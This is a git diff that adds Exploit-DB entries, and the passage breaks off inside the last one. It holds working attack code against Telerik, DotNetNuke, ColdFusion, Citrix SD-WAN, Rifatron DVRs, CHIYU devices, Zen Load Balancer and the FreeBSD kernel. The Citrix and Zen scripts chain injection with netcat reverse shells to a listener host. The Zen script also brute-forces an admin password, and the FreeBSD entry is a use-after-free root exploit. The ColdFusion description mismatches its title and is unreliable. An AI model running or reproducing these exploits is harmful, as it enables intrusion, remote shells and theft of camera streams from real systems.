+[*] Local payload name:  sleep_2019121205271355_x86.dll
+[*] Destination folder:  C:\Windows\Temp
+[*] Remote payload name: 1576142987.918625.dll
+
+{'fileInfo': {'ContentLength': 75264,
+              'ContentType': 'application/octet-stream',
+              'DateJson': '1970-01-01T00:00:00.000Z',
+              'FileName': '1576142987.918625.dll',
+              'Index': 0},
+ 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '
+                                     'Telerik.Web.UI, Version=<VERSION>, '
+                                     'Culture=neutral, '
+                                     'PublicKeyToken=<TOKEN>',
+              'TempFileName': '1576142987.918625.dll'}}
+
+[*] Triggering deserialization...
+
+<title>Runtime Error</title>
+<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
+<h2> <i>Runtime Error</i> </h2></span>
+...omitted for brevity...
+
+[*] Response time: 13.01 seconds
+In the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).
+
+Thanks
+@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip
\ No newline at end of file
diff --git a/exploits/aspx/webapps/48124.txt b/exploits/aspx/webapps/48124.txt
new file mode 100644
index 000000000..0620f9632
--- /dev/null
+++ b/exploits/aspx/webapps/48124.txt
@@ -0,0 +1,21 @@
+# Exploit Title: DotNetNuke 9.5 - Persistent Cross-Site Scripting
+# Date: 2020-02-23
+# Exploit Author: Sajjad Pourali
+# Vendor Homepage: http://dnnsoftware.com/
+# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip
+# Version: <= 9.5
+# CVE : N/A
+# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175
+
+DNN allows normal users to upload XML files by using journal tools in their profile. An attacker could upload XML files which may execute malicious scripts in the user’s browser.
+
+In XML, a namespace is an identifier used to distinguish between XML element names and attribute names which might be the same. One of the standard namespaces is “http://www.w3.org/1999/xhtml” which permits us to run XHTML tags such as <script>.
+
+For instance, uploading the following code as an XML file executes javascript and shows a non-harmful ‘XSS’ alert.
+
+<?xml version="1.0" encoding="UTF-8"?>
+<script xmlns="http://www.w3.org/1999/xhtml">
+ alert('XSS');
+</script>
+
+Though stealing of authentication cookies are not possible at this time (because the authentication’s cookies are set as HttpOnly by default), XSS attacks are not limited to stealing users’ cookies. Using XSS vulnerability, an attacker can perform other more damaging attacks on other or high privileged users, for example, bypassing CSRF protections which allows uploading “aspx” extension files through settings page which leads to upload of backdoor files.
\ No newline at end of file
diff --git a/exploits/aspx/webapps/48125.txt b/exploits/aspx/webapps/48125.txt
new file mode 100644
index 000000000..2c0d49dd8
--- /dev/null
+++ b/exploits/aspx/webapps/48125.txt
@@ -0,0 +1,70 @@
+# Exploit Title: DotNetNuke 9.5 - File Upload Restrictions Bypass
+# Date: 2020-02-23
+# Exploit Author: Sajjad Pourali
+# Vendor Homepage: http://dnnsoftware.com/
+# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip
+# Version: <= 9.5
+# CVE : N/A
+# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175
+
+The DNN has a file upload module for superuser. As a superuser, you can upload files with the following formats — “jpg, jpeg, jpe, gif, bmp, png, svg, ttf, eot, woff, doc, docx, xls, xlsx, ppt, pptx, pdf, txt, xml, xsl, xsd, css, zip, rar, template, htmtemplate, ico, avi, mpg, mpeg, mp3, wmv, mov, wav, mp4, webm, ogv”.
+
+As a normal user you are allowed to upload files with “bmp,gif,ico,jpeg,jpg,jpe,png,svg” extensions. The same file upload module used for superuser is reused for normal users with extra validation for a few additional extensions e.g. CSS extension is not allowed.
+
+Unfortunately, only for superuser, whitelisted extension check is performed at the server end. For normal users, extra extension validation is performed at client-side only. Hence, a low privileged normal user can bypass the client-side validation and upload files with extensions which are allowed only for superuser only.
+
+For example, a normal privileged user can upload a file with extension which is allowed only for superuser, by executing the following code on a browser’s console (in the tab that manages profile’s page has opened). This attack may also be performed using proxy tools such as Burp, ZAP etc.
+
+dnn.createFileUpload({
+    "clientId": "dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_FileUploadControl",
+    "moduleId": "",
+    "parentClientId": null,
+    "showOnStartup": true,
+    "folderPicker": {
+        "selectedItemCss": "selected-item",
+        "internalStateFieldId": null,
+        "disabled": false,
+        "selectItemDefaultText": "",
+        "initialState": {
+            "selectedItem": {
+                "key": "0",
+                "value": "My Folder"
+            }
+        },
+        "onSelectionChanged": []
+    },
+    "maxFileSize": 299892736,
+    "maxFiles": 0,
+    "extensions": ["jpg", "jpeg", "jpe", "gif", "bmp", "png", "svg", "ttf", "eot", "woff", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt", "xml", "xsl", "xsd", "css", "zip", "rar", "template", "htmtemplate", "ico", "avi", "mpg", "mpeg", "mp3", "wmv", "mov", "wav", "mp4", "webm", "ogv"],
+    "resources": {
+        "title": "Upload Files",
+        "decompressLabel": "Decompress Zip Files",
+        "uploadToFolderLabel": "Upload To:",
+        "dragAndDropAreaTitle": "Drag files here or click to browse",
+        "uploadFileMethod": "Upload File",
+        "uploadFromWebMethod": "From URL",
+        "closeButtonText": "Close",
+        "uploadFromWebButtonText": "Upload",
+        "decompressingFile": "Decompressing File",
+        "fileIsTooLarge": "File size bigger than 286. Mb",
+        "fileUploadCancelled": "Upload cancelled",
+        "fileUploadFailed": "Upload failed",
+        "fileUploaded": "File uploaded",
+        "emptyFileUpload": "Your browser does not support empty file uploads.",
+        "fileAlreadyExists": "The file you want to upload already exists in this folder.",
+        "uploadStopped": "File upload stopped",
+        "urlTooltip": "Enter Resource URL like https://SomeWebSite.com/Images/About.png",
+        "keepButtonText": "Keep",
+        "replaceButtonText": "Replace",
+        "tooManyFiles": "You cannot upload more than {0} file(s) at once.",
+        "invalidFileExtensions": "Some selected files with invalid extensions are excluded from upload.  You can only upload files with the following extensions: bmp, gif, ico, jpeg, jpg, jpe, png, svg.",
+        "unzipFilePromptTitle": "Unzip Information",
+        "unzipFileFailedPromptBody": "<div class=\"invalidFiles\"><p>[COUNT] of [TOTAL] file(s) were not extracted because their file types are not supported:</p>[FILELIST]</div>",
+        "unzipFileSuccessPromptBody": "<div class=\"validFiles\"><p>[TOTAL] of [TOTAL] file(s) were extracted successfully.</p></div>",
+        "errorDialogTitle": "Error"
+    },
+    "width": 780,
+    "height": 630,
+    "folderPath": dnn.dnnFileUpload.settings.dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_dnnFileUploadScope.folder,
+    "parameters": {}
+});
\ No newline at end of file
diff --git a/exploits/cfm/webapps/47392.txt b/exploits/cfm/webapps/47392.txt
new file mode 100644
index 000000000..a09685700
--- /dev/null
+++ b/exploits/cfm/webapps/47392.txt
@@ -0,0 +1,64 @@
+===========Security Intelligence============
+# Vendor Homepage: adobe.com
+# Version: 2018
+# Tested on: Adobe ColdFusion 2018
+# Exploit Author: Pankaj Kumar Thakur (Nepal)
+
+==========[Table of Contents]==============
+ * Overview
+ * Detailed description
+ * Thanks & Acknowledgements
+ * References
+ 
+==========[Vulnerability Information]========
+
+ * Unrestricted file upload in Adobe ColdFusion 2018
+ * CWE-434
+ * Base Score: 6.8 MEDIUM 
+ * Vector: AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H
+ 
+=========[ Overview]=========================
+ 
+ * System Affected: Adobe ColdFusion 2018
+ * Impact: Unrestricted file upload
+ 
+=====[ Detailed description]=================
+Unrestricted file upload vulnerability in the Symantec Advanced Secure Gateway (ASG) and ProxySG management consoles. A malicious appliance administrator can upload arbitrary malicious files to the management console and trick another administrator user into downloading and executing malicious code.
+
+Request
+
+POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
+HTTP/1.1
+Host: hostname:portno
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
+Content-Type: multipart/form-data;
+Content-Length: 303
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+.
+.
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="file"; filename="shell_file with extension"
+Content-Type: image/jpeg
+
+shell code
+-----------------------------24464570528145
+Content-Disposition: form-data; name="path"
+.
+.
+After uploading shell, its located here
+
+http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file with extension
+
+=====[ Thanks & Acknowledgements]========================================
+* Acknowledged by Adobe
+* Duplicate
+ 
+ 
+ * https://nvd.nist.gov/vuln/detail/CVE-2016-10258
+ * https://www.cvedetails.com/cve/CVE-2016-1713/
+ * https://www.openwall.com/lists/oss-security/2016/01/12/4
+ 
+=====[ EOF ]===========================================================
\ No newline at end of file
diff --git a/exploits/cgi/webapps/47112.py b/exploits/cgi/webapps/47112.py
new file mode 100755
index 000000000..30e65008b
--- /dev/null
+++ b/exploits/cgi/webapps/47112.py
@@ -0,0 +1,104 @@
+# Exploit Title: Citrix SD-WAN Appliance 10.2.2 Auth Bypass and Remote Command Execution
+# Date: 2019-07-12
+# Exploit Author: Chris Lyne (@lynerc)
+# Vendor Homepage: https://www.citrix.com
+# Product: Citrix SD-WAN
+# Software Link: https://www.citrix.com/downloads/citrix-sd-wan/
+# Version: Tested against 10.2.2
+# Tested on: 
+#	- Vendor-provided .OVA file
+# CVE: CVE-2019-12989, CVE-2019-12991
+#
+# See Also:
+# https://www.tenable.com/security/research/tra-2019-32
+# https://medium.com/tenable-techblog/an-exploit-chain-against-citrix-sd-wan-709db08fb4ac
+# https://support.citrix.com/article/CTX251987
+#
+# This code exploits both CVE-2019-12989 and CVE-2019-12991
+# You'll need your own Netcat listener
+
+import requests, urllib
+import sys, os, argparse
+import random
+from OpenSSL import crypto
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+TIMEOUT = 10 # sec
+
+def err_and_exit(msg):
+    print '\n\nERROR: ' + msg + '\n\n'
+    sys.exit(1)
+
+# CVE-2019-12989
+# auth bypass via file write
+def do_sql_injection(base_url):
+    url = base_url + '/sdwan/nitro/v1/config/get_package_file?action=file_download'
+    headers = { 'SSL_CLIENT_VERIFY' : 'SUCCESS' }
+    token = random.randint(10000, 99999)
+    json = {
+        "get_package_file": {
+            "site_name"         : "blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_" + str(token) + "';#",
+            "appliance_type"    : "primary",
+            "package_type"      : "active"
+        }
+    }
+
+    try:
+        r = requests.post(url, headers=headers, json=json, verify=False, timeout=TIMEOUT)
+    except requests.exceptions.ReadTimeout:
+        return None
+
+    # error is expected
+    expected = {"status":"fail","message":"Invalid value specified for site_name or appliance_type"}
+    if (r.status_code == 400 and r.json() == expected):
+        return token
+    else:
+        return None
+
+# CVE-2019-12991
+# spawns a reverse shell
+def do_cmd_injection(base_url, token, ncip, ncport):
+    cmd = 'sudo nc -nv %s %d -e /bin/bash' % (ncip, ncport) # 
+    url = base_url + '/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % (token, cmd)
+    success = False
+    try:
+        r = requests.get(url, verify=False, timeout=TIMEOUT)
+    except requests.exceptions.ReadTimeout:
+        success = True
+
+    # a timeout is success. it means we should have a shell
+    return success
+
+##### MAIN #####
+
+desc = 'Citrix SD-WAN Appliance Auth Bypass and Remote Command Execution'
+arg_parser = argparse.ArgumentParser(description=desc)
+arg_parser.add_argument('-t', required=True, help='Citrix SD-WAN IP Address (Required)')
+arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP')
+arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)')
+
+args = arg_parser.parse_args()
+
+print "Starting... be patient. This takes a sec."
+
+# Path to target app
+base_url = 'https://' + args.t
+
+# do sql injection to get a swc-token for auth bypass
+token = do_sql_injection(base_url)
+if (token is None):
+    err_and_exit('SQL injection failed.')
+
+print 'SQL injection successful! Your swc-token is ' + str(token) + '.'
+
+# if this worked, do the command injection
+# create a new admin user and spawn a reverse shell
+success = do_cmd_injection(base_url, token, args.ncip, args.ncport)
+
+if success is False:
+    err_and_exit('Not so sure command injection worked. Expected a timeout.')
+
+print 'Seems like command injection succeeded.'
+print 'Check for your shell!\n'
+print 'To add an admin web user, run this command: perl /home/talariuser/bin/user_management.pl addUser eviladmin evilpassword 1'
\ No newline at end of file
diff --git a/exploits/cgi/webapps/47368.sh b/exploits/cgi/webapps/47368.sh
new file mode 100755
index 000000000..4bc3182fa
--- /dev/null
+++ b/exploits/cgi/webapps/47368.sh
@@ -0,0 +1,75 @@
+#!/bin/bash
+#
+#
+# Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure
+#
+#
+# Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd.
+# Product web page: http://www.rifatron.com
+# Affected version: 5brid DVR (HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504)
+#                   7brid DVR (HD3-16V2, DX3-16V2/08V2/04V2, MX3-08V2/04V2)
+#                   Firmware: <=8.0 (000143)
+#
+#
+# Summary: Rifatron with its roots in Seoul, Korea has been supplying and
+# servicing the security market as a leading CCTV/video surveillance security
+# system manufacturer, specializing in stand-alone digital video recorder since
+# 1998. We are known for marking the first standalone DVR with audio detection
+# and 480 frames per secone(fps) and have been focusing on highend products and
+# large projects in a variety applications and merket. These include government
+# and public services, banking and finance, hotels and entertatinment, retail
+# education, industrial and commercial sectors throughout Europe, Middle East,
+# the U.S. and Asia. Based on the accumulated know-how in the security industry,
+# Rifatron is trying its utmost for the technology development and customer
+# satisfaction to be the best security solution company in the world.
+#
+# Desc: The DVR suffers from an unauthenticated and unauthorized live stream
+# disclosure when animate.cgi script is called through Mobile Web Viewer module.
+#
+# Tested on: Embedded Linux
+#            Boa/0.94.14rc21
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2019-5532
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php
+#
+#
+# 03.09.2019
+#
+
+#{PoC}
+#
+set -euo pipefail
+IFS=$'\n\t'
+if [ "$#" -ne 2 ]; then
+    echo "Usage: $0 IP:PORT CHANNEL" # Valid channel integers: 0-15
+    echo "Ex.: $0 10.9.8.7:65432 10"
+    exit
+fi
+IP=$1
+CHANNEL=$2
+HOST="http://$IP/cgi-bin/animate.cgi?$CHANNEL"
+STATUS=$(curl -Is http://$IP/mobile_viewer_login.html 2>/dev/null | head -1 | awk -F" " '{print $2}')
+if [ "$STATUS" == "404" ]; then
+    echo "Target not vulnerable!"
+    exit
+fi
+echo "Collecting snapshots..."
+for x in {1..10};
+    do echo -ne $x
+    curl "$HOST" -o sequence-$x.jpg -#;
+    sleep 0.6
+    done
+echo -ne "\nDone."
+echo -ne "\nRendering video..."
+ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i sequence-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p video.mp4
+echo " done."
+echo -ne "\nRunning animation..."
+sleep 1
+cvlc video.mp4 --verbose -1 -f vlc://quit
+#
+#{/PoC}
\ No newline at end of file
diff --git a/exploits/cgi/webapps/48040.txt b/exploits/cgi/webapps/48040.txt
new file mode 100644
index 000000000..c5b50a374
--- /dev/null
+++ b/exploits/cgi/webapps/48040.txt
@@ -0,0 +1,23 @@
+# Exploit Title: CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting
+# Google Dork: In Shodan search engine, the filter is "CHIYU"
+# Date: 2020-02-11
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.chiyu-t.com.tw/en/
+# Version: BF430 232/485 TCP/IP Converter all versions prior to 1.16.00
+# Tested on: It is a proprietary devices: https://www.chiyu-t.com.tw/en/product/rs485-to-tcp_ip-converter_BF-430.html
+# CVE: CVE-2020-8839
+
+# 1. Description:
+# In CHIYU BF430 web page,
+# user can modify the system configuration by access the /if.cgi.
+# Attackers can inject malicious XSS code in "TF_submask" field.
+# The XSS code will be stored in the database, so that causes a stored XSS vulnerability.
+
+# 2. Proof of Concept:
+# Access the /if.cgi of CHIYU BF430 232/485 TCP/IP Converter.
+# Injecting the XSS code in parameter “TF_submask”:
+# http://<Your Modem IP>/if.cgi?TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
+
+==---------------------------------------------------------------
+This email contains information that is for the sole use of the intended recipient and may be confidential or privileged. If you are not the intended recipient, note that any disclosure, copying, distribution, or use of this email, or the contents of this email is prohibited. If you have received this email in error, please notify the sender of the error and delete the message. Thank you.
+---------------------------------------------------------------==!!
\ No newline at end of file
diff --git a/exploits/cgi/webapps/48266.py b/exploits/cgi/webapps/48266.py
new file mode 100755
index 000000000..b8d533935
--- /dev/null
+++ b/exploits/cgi/webapps/48266.py
@@ -0,0 +1,110 @@
+# Exploit Title: Zen Load Balancer 3.10.1 - Remote Code Execution
+# Google Dork: no
+# Date: 2020-03-28
+# Exploit Author: Cody Sixteen
+# Vendor Homepage: https://code610.blogspot.com
+# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
+# Version: 3.10.1
+# Tested on: Linux 
+# CVE : CVE-2019-7301
+
+#c@kali:~/src/eonila/zenload3r$ cat zenload3r.py
+#!/usr/bin/env python
+# zenload3r.py - zen load balancer pwn3r
+# 28.03.2020 @ 22:41
+#
+# by cody sixteen
+#
+
+import base64
+import sys, re
+import requests
+import ssl
+from functools import partial
+ssl.wrap_socket = partial(ssl.wrap_socket, ssl_version=ssl.PROTOCOL_TLSv1)
+# disable ssl warnings:
+import urllib3
+urllib3.disable_warnings()
+from requests.auth import HTTPBasicAuth
+
+#
+target = sys.argv[1]
+username = 'admin'
+password = 'P@ssw0rd'
+
+def main():
+  print 'zenload3r.py - zen load balancer pwn3r'
+  print '      zenload3r.py - vs - %s' % ( target )
+  print ''
+
+  print '[+] checking if host is alive...'
+  global sess
+  sess = requests.session()
+  global baseUrl
+  baseUrl = target + ':444/index.cgi'
+  checkBaseUrl = sess.get(baseUrl, verify=False)
+  checkBaseResp = checkBaseUrl.status_code
+
+  #print checkBaseResp
+  if checkBaseResp == 401:
+    print '[i] ...it is. we need to log in to proceed'
+    logmein(baseUrl)
+
+
+def logmein(target):
+  print '[+] trying %s and default password "%s" vs %s' % (username, password, baseUrl)
+
+  #pwd_file = '/usr/share/wordlists/dirb/common.txt'
+  pwd_file = 'passwd.lst'
+
+  try:
+    read_pwds = open(pwd_file, 'r')
+    pwds = read_pwds.readlines()
+
+    for pwd in pwds:
+      pwd = pwd.rstrip()
+      logme = sess.post(baseUrl, auth=HTTPBasicAuth(username,pwd), allow_redirects=True)
+      logmeresp = logme.text
+
+      #print logmeresp
+      if '<p>Hello <strong>admin</strong>' in logmeresp:
+        print '[+] admin user logged-in! :D'
+        print '[+] working password: %s' % ( pwd )
+
+        load3r(baseUrl, pwd)
+
+  except requests.exceptions.ConnectionError:
+    print '[-] Can not connect to remote host :C\n'
+
+
+def load3r(baseUrl, pwd):
+  print '[+] time to get reverse shell, preparing...'
+
+  creds = base64.b64encode("{}:{}".format(username,pwd))
+  creds2 = creds.rstrip()
+  print 'creds: ', creds2
+
+  baseUrl = "https://192.168.1.200:444/index.cgi"
+  headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0",
+    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
+    "Accept-Language": "pl,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate",
+    "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://192.168.1.200:444",
+    "Authorization": "Basic {}".format(creds2), "Connection": "close",
+    "Referer": "https://192.168.1.200:444/index.cgi?id=1-3&action=Show_Form", "Upgrade-Insecure-Requests": "1"
+  }
+  sh = "a\";nc 192.168.1.170 4444 -e /bin/sh;#"
+  reqdata = {"cert_name": "qweqweqwe", "cert_issuer": "Sofintel",
+    "cert_fqdn": "qweqweqwe", "cert_division": "qweqweqwe",
+    "cert_organization": sh,
+    "cert_locality": "qweqweqwe", "cert_state": "qweqweqwe",
+    "cert_country": "qw", "cert_mail": "qweqweqwe@qweqweqwe.com",
+    "cert_key": "2048", "id": "1-3", "actionpost": "Generate CSR", "button": "Generate CSR"}
+
+  requests.post(baseUrl, headers=headers, data=reqdata,verify=False)
+
+  print '[*] got r00t? ;>\n'
+
+
+# run me:
+if __name__ == '__main__':
+  main()
\ No newline at end of file
diff --git a/exploits/freebsd/local/47829.sh b/exploits/freebsd/local/47829.sh
new file mode 100755
index 000000000..2db9a8699
--- /dev/null
+++ b/exploits/freebsd/local/47829.sh
@@ -0,0 +1,677 @@
+# Exploit: FreeBSD-SA-19:02.fd - Privilege Escalation
+# Date: 2019-12-30
+# Author: Karsten König of Secfault Security
+# Twitter: @gr4yf0x
+# Kudos: Maik, greg and Dirk for discussion and inspiration
+# CVE: CVE-2019-5596
+# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper
+
+#!/bin/sh
+
+echo "[+] Root Exploit for FreeBSD-SA-19:02.fd by Secfault Security"
+
+umask 0000
+
+if [ ! -f /etc/libmap.conf ]; then
+    echo "[!] libmap.conf has to exist"
+    exit
+fi
+
+cp /etc/libmap.conf ./
+
+cat > heavy_cyber_weapon.c << EOF
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <pthread_np.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/cpuset.h>
+#include <sys/event.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/sysctl.h>
+#include <sys/types.h>
+#include <sys/un.h>
+
+#define N_FDS 0xfe
+#define N_OPEN 0x2
+
+#define N 1000000
+#define NUM_THREADS 400
+#define NUM_FORKS 3
+#define FILE_SIZE 1024
+#define CHUNK_SIZE 1
+#define N_FILES 25
+
+#define SERVER_PATH "/tmp/sync_forks"
+#define DEFAULT_PATH "/tmp/pwn"
+#define HAMMER_PATH "/tmp/pwn2"
+#define ATTACK_PATH "/etc/libmap.conf"
+
+#define HOOK_LIB "libutil.so.9"
+#define ATTACK_LIB "/tmp/libno_ex.so.1.0"
+
+#define CORE_0 0
+#define CORE_1 1
+
+#define MAX_TRIES 500
+
+struct thread_data {
+    int fd;
+    int fd2;
+};
+
+pthread_mutex_t write_mtx, trigger_mtx, count_mtx, hammer_mtx;
+pthread_cond_t write_cond, trigger_cond, count_cond, hammer_cond;
+
+int send_recv(int fd, int sv[2], int n_fds) {
+    int ret, i;
+    struct iovec iov;
+    struct msghdr msg;
+    struct cmsghdr *cmh;
+    char cmsg[CMSG_SPACE(sizeof(int)*n_fds)];
+    int *fds;    char buf[1];
+
+    iov.iov_base = "a";
+    iov.iov_len = 1;
+
+    msg.msg_name = NULL;
+    msg.msg_namelen = 0;
+    msg.msg_iov = &iov;
+    msg.msg_iovlen = 1;
+    msg.msg_control = cmsg;
+    msg.msg_controllen = CMSG_LEN(sizeof(int)*n_fds);
+    msg.msg_flags = 0;
+
+    cmh = CMSG_FIRSTHDR(&msg);
+    cmh->cmsg_len = CMSG_LEN(sizeof(int)*n_fds);
+    cmh->cmsg_level = SOL_SOCKET;
+    cmh->cmsg_type = SCM_RIGHTS;
+    fds = (int *)CMSG_DATA(cmsg);
+    for (i = 0; i < n_fds; i++) {
+	fds[i] = fd;
+    }
+
+    ret = sendmsg(sv[0], &msg, 0);
+    if (ret == -1) {
+	return 1;
+    }
+
+    iov.iov_base = buf;
+    msg.msg_name = NULL;
+    msg.msg_namelen = 0;
+    msg.msg_iov = &iov;
+    msg.msg_iovlen = 1;
+    msg.msg_control = cmh;
+    msg.msg_controllen = CMSG_SPACE(0);
+    msg.msg_flags = 0;
+
+    ret = recvmsg(sv[1], &msg, 0);
+    if (ret == -1) {
+	return 1;
+    }
+
+    return 0;
+}
+
+int open_tmp(char *path)
+{
+    int fd;
+    char *real_path;
+
+    if (path != NULL) {
+	real_path = malloc(strlen(path) + 1);
+	strcpy(real_path, path);
+    }
+    else {
+	real_path = malloc(strlen(DEFAULT_PATH) + 1);
+	strcpy(real_path, DEFAULT_PATH);
+    }
+
+    if ((fd = open(real_path, O_RDWR | O_CREAT)) == -1) {
+	perror("[!] open");
+	exit(1);
+    }
+
+    fchmod(fd, 0700);
+    
+    return fd;
+}
+
+void prepare_domain_socket(struct sockaddr_un *remote, char *path) {
+    bzero(remote, sizeof(struct sockaddr_un));
+    remote->sun_family = AF_UNIX;
+    strncpy(remote->sun_path, path, sizeof(remote->sun_path));
+}
+
+int bind_domain_socket(struct sockaddr_un *remote) {
+    int server_socket;
+    
+    if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
+	perror("[!] socket");
+	exit(1);
+    }
+
+    if (bind(server_socket, 
+	     (struct sockaddr *) remote, 
+	     sizeof(struct sockaddr_un)) != 0) {
+	perror("[!] bind");
+	exit(1);
+    }
+
+    return server_socket;
+}
+
+int connect_domain_socket_client() {
+    int client_socket;
+    
+    if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
+	perror("[!] socket");
+	exit(1);
+    }
+
+    return client_socket;
+}
+
+// Prevent panic at termination because f_count of the
+// corrupted struct file is 0 at the moment this function
+// is used but fd2 still points to the struct, hence fdrop()
+// is called at exit and will panic because f_count will
+// be below 0
+//
+// So we just use our known primitive to increase f_count
+void prevent_panic(int sv[2], int fd)
+{
+    send_recv(fd, sv, 0xfe);
+}
+
+int stick_thread_to_core(int core) {
+    /* int num_cores = sysconf(_SC_NPROCESSORS_ONLN); */
+    /* if (core_id < 0 || core_id >= num_cores) */
+    /* 	return EINVAL; */    
+    cpuset_t cpuset;
+    CPU_ZERO(&cpuset);
+    CPU_SET(core, &cpuset);
+    
+    pthread_t current_thread = pthread_self();    
+    return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset);
+}
+
+void *trigger_uaf(void *thread_args) {
+    struct thread_data *thread_data;
+    int fd, fd2;
+
+    if (stick_thread_to_core(CORE_0) != 0) {
+	perror("[!] [!] trigger_uaf: Could not stick thread to core");
+    }
+    
+    thread_data = (struct thread_data *)thread_args;
+    fd = thread_data->fd;
+    fd2 = thread_data->fd2;
+
+    printf("[+] trigger_uaf: fd: %d\n", fd);
+    printf("[+] trigger_uaf: fd2: %d\n", fd2);
+    
+    printf("[+] trigger_uaf: Waiting for start signal from monitor\n");
+    pthread_mutex_lock(&trigger_mtx);
+    pthread_cond_wait(&trigger_cond, &trigger_mtx);
+
+    usleep(40);
+    
+    // Close to fds to trigger uaf
+    //
+    // This assumes that fget_write() in kern_writev()
+    // was already successful!
+    //
+    // Otherwise kernel panic is triggered
+    //
+    // refcount = 2 (primitive+fget_write)
+    close(fd);
+    close(fd2);
+    // refcount = 0 => free
+    fd = open(ATTACK_PATH, O_RDONLY);
+    // refcount = 1
+
+    printf("[+] trigger_uaf: Opened read-only file, now hope\n");	
+    printf("[+] trigger_uaf: Exit\n");
+    
+    pthread_exit(NULL);
+}
+
+void *hammer(void *arg) {
+    int i, j, k, client_socket, ret;
+    char buf[FILE_SIZE], sync_buf[3];
+    FILE *fd[N_FILES];
+    struct sockaddr_un remote;
+
+    prepare_domain_socket(&remote, SERVER_PATH);
+    client_socket = connect_domain_socket_client();
+    strncpy(sync_buf, "1\n", 3);
+    
+    for (i = 0; i < N_FILES; i++) {
+	unlink(HAMMER_PATH);
+	if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) {
+	    perror("[!] fopen");
+	    exit(1);
+	}
+    }
+    
+    for (i = 0; i < FILE_SIZE; i++) {
+    	buf[i] = 'a';
+    }
+
+    pthread_mutex_lock(&hammer_mtx);
+
+    // Sometimes sendto() fails because
+    // no free buffer is available
+    for (;;) {
+	if (sendto(client_socket,
+		   sync_buf,
+		   strlen(sync_buf), 0,
+		   (struct sockaddr *) &remote,
+		   sizeof(remote)) != -1) {
+	    break;
+	}
+    }
+    
+    pthread_cond_wait(&hammer_cond, &hammer_mtx);
+    pthread_mutex_unlock(&hammer_mtx);
+    
+    for (i = 0; i < N; i++) {
+	for (k = 0; k < N_FILES; k++) {
+	    rewind(fd[k]);   
+	}
+	for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) {
+	    for (k = 0; k < N_FILES; k++) {
+		if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0) {
+		    perror("[!] fwrite");
+		    exit(1);
+		}
+	    }
+	    fflush(NULL);
+	}
+    }
+    
+    pthread_exit(NULL);
+}
+
+// Works on UFS only
+void *monitor_dirty_buffers(void *arg) {
+    int hidirtybuffers, numdirtybuffers;
+    size_t len;
+
+    len = sizeof(int);
+    
+    if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) {
+	perror("[!] sysctlbyname hidirtybuffers");
+	exit(1);
+    };
+    printf("[+] monitor: vfs.hidirtybuffers: %d\n", hidirtybuffers);
+
+    while(1) {
+	sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0);
+	if (numdirtybuffers >= hidirtybuffers) {
+	    pthread_cond_signal(&write_cond);
